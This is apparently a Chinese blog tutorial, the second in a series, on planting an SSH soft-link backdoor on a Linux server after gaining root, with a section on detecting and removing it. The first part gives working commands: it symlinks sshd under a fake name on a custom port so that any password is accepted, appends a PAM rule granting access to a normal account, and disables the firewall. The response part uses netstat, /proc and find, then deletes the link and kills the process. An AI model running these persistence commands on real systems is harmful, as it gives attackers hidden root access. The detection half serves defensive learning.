一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、SSH软链接后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机)

在目标服务器上执行命令:

1、第一种:创建root账户 ssh软链接后门命令:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接
systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

LINUX留后门--教程(二)—— SSH软链接后门_软链接


连接软链接后门测试:

此处密码可以随意

ssh root@XXX.XXX.XXX.XXX -p 12345

LINUX留后门--教程(二)—— SSH软链接后门_服务器_02

2、第二种:创建其它账户 ssh软连接后门命令
前提: 服务器存在普通账户wxg

第一步执行以下命令:
echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/wxg

第二步执行开启软链接命令
ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725

systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

LINUX留后门--教程(二)—— SSH软链接后门_服务器_03


kali远程连接wxg账户测试成功

LINUX留后门--教程(二)—— SSH软链接后门_代码审计_04

三、SSH软链接后门——应急响应发现

第一步:查看服务器开放的端口号

netstat -anpt

发现开启有12345、14725异常端口,且名字为su、wxg,且su的PID 为7702

LINUX留后门--教程(二)—— SSH软链接后门_软链接_05


查看PID 7702所使用的程序为ssh

ll /proc/7702

LINUX留后门--教程(二)—— SSH软链接后门_服务器_06


第二步:确定软链接后门文件

查看所有的su文件,以及查找具体哪一个su是软链接后门

find -name su
ll /usr/share/bash-completion/completions/su
ll /usr/local/su

LINUX留后门--教程(二)—— SSH软链接后门_软链接_07


最终确定软链接为:/usr/local/su

第三步:删除软链接后门

rm -rf   /usr/local/su
kill -9 7702

LINUX留后门--教程(二)—— SSH软链接后门_服务器_08


切记: 不要用 rm -rf /usr/local/su/,如果后面多一个斜杠,就会把文件删除!

LINUX留后门--教程(二)—— SSH软链接后门_软链接_09


软链接被成功清除,登录不上了

LINUX留后门--教程(二)—— SSH软链接后门_服务器_10


更多资源:

1、web安全工具、渗透测试工具

2、存在漏洞的网站源码与代码审计+漏洞复现教程、

3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频

4、应急响应真实案例复现靶场与应急响应教程